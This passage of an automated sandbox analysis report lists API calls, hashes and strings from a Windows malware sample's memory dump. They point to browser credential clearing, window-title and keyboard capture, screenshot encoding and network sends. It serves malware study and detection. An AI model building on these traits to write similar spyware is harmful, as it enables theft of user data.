                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: f89291304a458ec6101823dfa090e6972dad8ae5947ff926b234eb846b514380
                                                  • Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
                                                  • Opcode Fuzzy Hash: f89291304a458ec6101823dfa090e6972dad8ae5947ff926b234eb846b514380
                                                  • Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
                                                  APIs
                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: 69f93e903a5a9c6d889e9b85f3e5b234b319eb86257ec0e35b47b15ed479ba79
                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                  • Opcode Fuzzy Hash: 69f93e903a5a9c6d889e9b85f3e5b234b319eb86257ec0e35b47b15ed479ba79
                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                  • String ID:
                                                  • API String ID: 188215759-0
                                                  • Opcode ID: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                                  • Instruction ID: 34fec0fc5de9b46989c99fc374850f6e4511d06c61be9fc580282ef5e3b3a0c9
                                                  • Opcode Fuzzy Hash: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                                  • Instruction Fuzzy Hash: 4A1142B35043446BC304FBB5CD85DEF77ACEBC4359F040A3EF64A82061EE29EA498695
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                  • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                  • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                  • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID:
                                                  • API String ID: 2633735394-0
                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EF0,?,00474EF0,00000000,00474EF0,00000000), ref: 0041C5BB
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                  • String ID: 0Q$hQG
                                                  • API String ID: 1634807452-3311280383
                                                  • Opcode ID: f5028bbbbb78a70b302da71ffe0b9b9c6bdce192909e6951e8d35ce13d703780
                                                  • Instruction ID: bd8839fee7d7b479886ee9dd8bc27b498e65f27a04cbeda07bab16e05f906841
                                                  • Opcode Fuzzy Hash: f5028bbbbb78a70b302da71ffe0b9b9c6bdce192909e6951e8d35ce13d703780
                                                  • Instruction Fuzzy Hash: 9C5131315082419BC328FB22D851AEFB3E5AFD4348F50483FF54AA71E2EF78594AC659
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alloca_probe_16__freea
                                                  • String ID: 0Q
                                                  • API String ID: 1635606685-1780094543
                                                  • Opcode ID: 39ec6928b8f34931f9504945d6b2612c47b101e4dc72cce765b8ce05dd2347ec
                                                  • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                  • Opcode Fuzzy Hash: 39ec6928b8f34931f9504945d6b2612c47b101e4dc72cce765b8ce05dd2347ec
                                                  • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                  • String ID: image/jpeg
                                                  • API String ID: 1291196975-3785015651
                                                  • Opcode ID: 9303b3a98036d401e8cbddb9066c3905d3f6784fff20d009cbf2c37f538b3a2b
                                                  • Instruction ID: b1b0a2c635f45e8130f4767810c6fbb161559e0826da6e7acb487c9aae22ef17
                                                  • Opcode Fuzzy Hash: 9303b3a98036d401e8cbddb9066c3905d3f6784fff20d009cbf2c37f538b3a2b
                                                  • Instruction Fuzzy Hash: 6D316F72504310AFC701EF65C884D6FB7E9EF8A304F00496EF98597251DB7999048B66
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                  • String ID: image/png
                                                  • API String ID: 1291196975-2966254431
                                                  • Opcode ID: 987b917c03e66718990ed617162df62515b77dfca822779b7a08762b8303520b
                                                  • Instruction ID: f628a6b37c0337dbee8ef7f798de7cbb8cc54a1da061f00231e4b0513ad08027
                                                  • Opcode Fuzzy Hash: 987b917c03e66718990ed617162df62515b77dfca822779b7a08762b8303520b
                                                  • Instruction Fuzzy Hash: 4221C375204211AFC700AB61CC89DBFBBACEFCA314F10452EF54693251DB389945CBA6
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00449CBC
                                                  • GetFileType.KERNEL32(00000000), ref: 00449CCE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID: xQ
                                                  • API String ID: 3000768030-532350464
                                                  • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                  • Instruction ID: 0971e15b3ed75ae4f19990cc7af9cd82d4526e04a272429d5fd5d939a02a2197
                                                  • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                  • Instruction Fuzzy Hash: EF11907250475246E7308F3E9CC8223BAD5AB52331B38072BD5B7966F1C328DC82F249
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 2b9fcdd6aaac52591c39182287ee2cef8773d30b11040be7444b827d287f97b8
                                                  • Instruction ID: b700b38ef9f928670de2390b904a97a1cb71e472754ad5b4355c5e73bb52b66b
                                                  • Opcode Fuzzy Hash: 2b9fcdd6aaac52591c39182287ee2cef8773d30b11040be7444b827d287f97b8
